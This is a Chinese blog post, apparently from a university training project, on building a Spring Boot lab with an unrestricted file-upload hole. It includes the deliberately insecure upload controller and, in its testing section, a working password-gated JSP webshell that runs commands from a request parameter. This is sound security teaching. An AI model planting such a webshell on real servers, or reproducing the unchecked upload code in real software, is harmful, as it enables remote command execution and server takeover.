山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十二)-任意文件上传漏洞(2)

已于 2022-06-02 21:14:54 修改
阅读量1k 收藏 3
点赞数 1
分类专栏: 山东大学软件学院项目实训 文章标签: web安全 山东大学软件学院 文件上传漏洞 靶场 springboot
于 2022-04-19 20:36:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47470899/article/details/124282729
版权

目录


前言:

上一篇博客介绍了关于文件上传漏洞的基础知识,以及基本的漏洞出现点、利用方式、以及如何防护等,并在此基础上思考如何构造一个文件上传漏洞靶场。本篇博客主要记录一下文件上传漏洞靶场的基本实现,以及部分关键代码。


2、项目配置

新建一个 springboot 项目

编写 application.properties:

设置文件上传的相关限制,以及 controller 层的 return 匹配目录

# 设置允许上传文件大小
spring.servlet.multipart.max-request-size=10MB
spring.servlet.multipart.max-file-size=10MB


## jsp
spring.mvc.view.prefix=/WEB-INF/views/
spring.mvc.view.suffix=.jsp

pom.xml 导入相关依赖

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.6.4</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>FileUpLoad</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>FileUpLoad</name>
    <description>FileUpLoad</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <!-- Spring Boot web启动器 -->
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <!-- jsp -->
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>jstl</artifactId>
        </dependency>
        <dependency>
            <groupId>org.apache.tomcat.embed</groupId>
            <artifactId>tomcat-embed-jasper</artifactId>
            <!--<scope>provided</scope>-->
        </dependency>

    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>


3、编写“文件上传漏洞”后端代码

UploadController.java:

实现文件上传功能,并返回上传成功界面或者上传失败界面。

这里没有做任何关于文件上传的限制,可上传任何类型文件,并且固定了文件名,可访问,所以存在文件上传漏洞。

package com.example.fileupload.controller;


import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.multipart.MultipartFile;
import org.springframework.web.multipart.MultipartHttpServletRequest;

import javax.servlet.http.HttpServletRequest;
import java.io.File;
import java.io.IOException;
import java.util.List;

/**
 * @Description
 * @Author lhw
 * @Date 2022-03-24
 */
@Controller
public class UploadController {
    private static final Logger LOGGER = LoggerFactory.getLogger(UploadController.class);

    @GetMapping("/upload")
    public String upload() {
        return "upload";
    }

    @PostMapping("/upload")
    //@ResponseBody
    public String upload(@RequestParam("file") MultipartFile file) {
        if (file.isEmpty()) {
            return "fail";
        }

        String fileName = "uploadfile.jsp";
        String filePath = "D:\\Code\\SDUWeb\\FileUpLoad\\src\\main\\webapp\\WEB-INF\\views\\";
        File dest = new File(filePath + fileName);
        try {
            file.transferTo(dest);
            LOGGER.info("上传成功");
            return "upload_success";
        } catch (IOException e) {
            LOGGER.error(e.toString(), e);
        }
        return "fail";
    }
}

uploadfileController.java:

用于访问用户上传的文件

package com.example.fileupload.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;

/**
 * @Description
 * @Author lhw
 * @Date 2022-03-24
 */

@Controller

public class uploadfileController {
    //payload:https://www.jianshu.com/p/792940a81088
    @GetMapping("/uploadfile")
    public String uploadfile() {
        return "uploadfile";
    }
    
}


4、编写“文件上传漏洞”前端代码

先建立 webapp\WEB-INF\views 目录

在这里插入图片描述

然后打开 file—ProjectStructure,按照下图配置

在这里插入图片描述

接下来在 views 目录下编写 jsp 文件

upload.jsp

<%--
  Created by IntelliJ IDEA.
  User: lhw
  Date: 2022/3/24
  Time: 21:02
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>文件上传</title>
</head>
<body>

<p>请在此上传您的文件</p>

<form method="post" action="/upload" enctype="multipart/form-data">
    <input type="file" name="file"><br>
    <input type="submit" value="提交">

</form>
</body>
</html>

uploadsuccess.jsp

<%--
  Created by IntelliJ IDEA.
  User: Lenovo
  Date: 2022/3/24
  Time: 22:02
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>文件上传成功</title>

</head>
<body>
<p>文件上传成功</p>
<input type="button" value="访问上传文件"
       οnclick="javascrtpt:window.location.href='http://localhost:8080/uploadfile'" />

</body>
</html>

fail.jsp

<%--
  Created by IntelliJ IDEA.
  User: Lenovo
  Date: 2022/3/24
  Time: 22:07
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>文件上传失败</title>   
</head>

<body>

文件上传失败!请选择文件或重新上传!

</body>
</html>


5、运行测试

首先写好一个木马文件,用于测试

<%@ page language="java" contentType="text/html; charset=GBK"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>一句话木马</title>
    </head>

    <body>
        <%
        if ("admin".equals(request.getParameter("pwd"))) {
            java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int len = -1;
            byte[] bytes = new byte[4092];
            out.print("<pre>");
            while ((len = input.read(bytes)) != -1) {
                out.println(new String(bytes, "GBK"));
            }
            out.print("</pre>");
        }
    %>
    </body>
</html>

idea 启动项目

在这里插入图片描述

浏览器访问漏洞界面

在这里插入图片描述

选择写好的木马文件

在这里插入图片描述

上传成功,访问该文件

在这里插入图片描述

输入密码admin,cmd=执行的命令

在这里插入图片描述

返回了执行 ipconfig 的结果,测试成功



陌兮_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 3916
2016年爆出的一个漏洞Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
SpringBoot漏洞大全
m0_67403188的博客
08-02 6588
前段时间做渗透发现了一个很眼熟的页面长这个样子页面log是去世界最大的同性交友网github.com搜了一下发现了一个十分详细的文章存在大量接口信息泄露成功交差。
SpringBoot漏洞
热门推荐
weixin_51151498的博客
01-19 1万+
spring漏洞
SpringBoot】本地到发布环境的文件上传bug记录
coralime的博客
03-31 198
【环境说明】 本地测试环境:win10 + tomact 发布测试环境:win server 2012 R2 + welogic 【代码说明】 后端接收前端的文件MultipartFile[] uploadFileList,完成上传操作 void UploadUtils(MultipartFile[] uploadFileList, Integer articleID, String pathURL, String type) throws IOException { for..
Springboot项目XSS漏洞的解决方法
xiaopy_0508的博客
07-12 4902
定义/原理:跨站脚本(Cross-Site Scripting),本应该缩写为CSS,但是该缩写已被层叠样式脚本Cascading Style Sheets所用,所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。本质:是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种 。特点:XSS主要基于JavaScript完成恶意的攻击行为,由于JS可以非
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
记一次springboot项目漏洞挖掘
YJ_12340的博客
05-08 1224
本文测试是在该cms旧版本上进行的,新版本对已有问题已进行了修复,这次对该java实现的cms漏洞挖掘收获满满,对cms安装、部署以及代码审计中要注意的点得到了良好的锻炼。
[Java代码审计]—文件上传漏洞
Sentiment的博客
11-05 3627
multipart/form-data这种编码方式的表单会以二进制流的方式来处理表单数据,这种编码方式会把文件域指定文件的内容也封装到请求参数里。可以与equlas对比来看,s1和s2只有大小写不同,如果用equals则返回false,equalsIgnoreCase返回true。上述都是no waf的文件上传方式,若不做任何防御的情况下,可以实现任意文件上传,造成文件上传漏洞。可以将图片存放到不可访问的路径,例如:Servlet的WEB-INF下,默认情况是访问不到的。通过上述任意方法,上传jsp马。
文件上传漏洞
m0_67391120的博客
03-07 5356
文件上传 文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、php、jsp等) 恶意上传行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。 文件上传漏洞成因 文件上传漏洞的成因(复杂),一方面,We
山东大学光电工程实训-红外测温枪装调实践训练实验报告与总结
07-07
山东大学光电工程实训-红外测温枪装调实践训练
山东大学软件学院-2021-计算机网络实验2.docx
11-06
山东大学软件学院-2021-计算机网络实验2
山东大学-软件学院-2021-计算机网络-实验11.docx
11-11
山东大学-软件学院-2021-计算机网络-实验11-最新版,过程详细
山东大学-软件学院-计算机网络-2021年-实验20.docx
11-11
山东大学-软件学院-计算机网络-2021年-实验20
山东大学光电工程实训-基于投影仪的基本光学实验报告与总结
07-07
山东大学光电工程实训-基于投影仪的基本光学实验报告与总结
【网络安全安全事件管理处置 — 安全事件处置思路指导
享你所想
04-26 683
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-20 1150
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全安全事件管理处置 — windows应急响应
最新发布
享你所想
04-26 848
一、账户排查 二、windows网络排查 三、进程排查 四、windows注册表排查 五、内存分析
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 861
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
山东大学软件学院软件专业实训 download.csdn.net
12-31
山东大学软件学院软件专业的实训平台是download.csdn.net。CSDN是中国最大的IT技术社区,提供各种软件开发相关的资源和学习资料。在这个平台上,软件专业的学生可以下载和学习各种软件开发工具、编程语言和技术,以及参与各种实际项目实训。 通过download.csdn.net,学生可以获取到丰富的软件开发资源,包括源代码、教学案例、视频教程等。这些资源可以帮助学生了解软件开发的基本知识和技能,以及深入学习各种软件开发工具和框架。学生可以根据自己的兴趣和需要选择下载相应的资料进行学习和实践。 此外,download.csdn.net还提供了一个交流平台,学生可以在这里与其他学习软件开发的同学一起讨论问题、分享经验和交流学习心得。这种交流和合作可以促进学生之间的学习和成长,提高他们的团队合作能力和解决问题的能力。 总的来说,山东大学软件学院软件专业实训平台download.csdn.net为学生提供了全面的软件开发资源和学习环境,帮助他们提高软件设计和开发的能力,为将来的职业发展做好准备。这个实训平台为学生提供了一个丰富的学习资源和交流平台,可以促进学生之间的学习和成长,并且与业界保持紧密联系,帮助学生了解行业最新动态和趋势。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

陌兮_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值